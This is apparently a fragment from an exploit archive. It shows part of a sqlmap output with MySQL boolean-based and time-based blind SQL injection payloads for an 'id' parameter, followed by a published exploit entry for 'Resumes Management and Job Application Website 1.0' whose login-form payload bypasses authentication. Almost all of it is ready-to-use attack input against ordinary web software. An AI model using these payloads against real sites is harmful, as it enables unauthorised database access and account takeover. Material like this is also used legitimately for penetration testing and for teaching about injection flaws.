    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
GROUP BY clause

    Payload: id=17' RLIKE (SELECT (CASE WHEN (7532=7532) THEN 17 ELSE 0x28
END))-- YDSn



    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: id=17' AND (SELECT 4939 FROM (SELECT(SLEEP(5)))EQuU)-- RaGm

---

[08:59:38] [INFO] the back-end DBMS is MySQL

web application technology: PHP 7.2.34, Apache 2.4.46

back-end DBMS: MySQL >= 5.0.12

# Exploit Title: Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection)
# Date: 2020-12-27
# Exploit Author: Kshitiz Raj (manitorpotterk)
# Vendor Homepage: http://egavilanmedia.com
# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Step 1 -  Go to url http://localhost/Resumes/login.html
Step 2 - Enter Username :-   ' or '1'='1'#
Step 3 -  Enter Password -   anything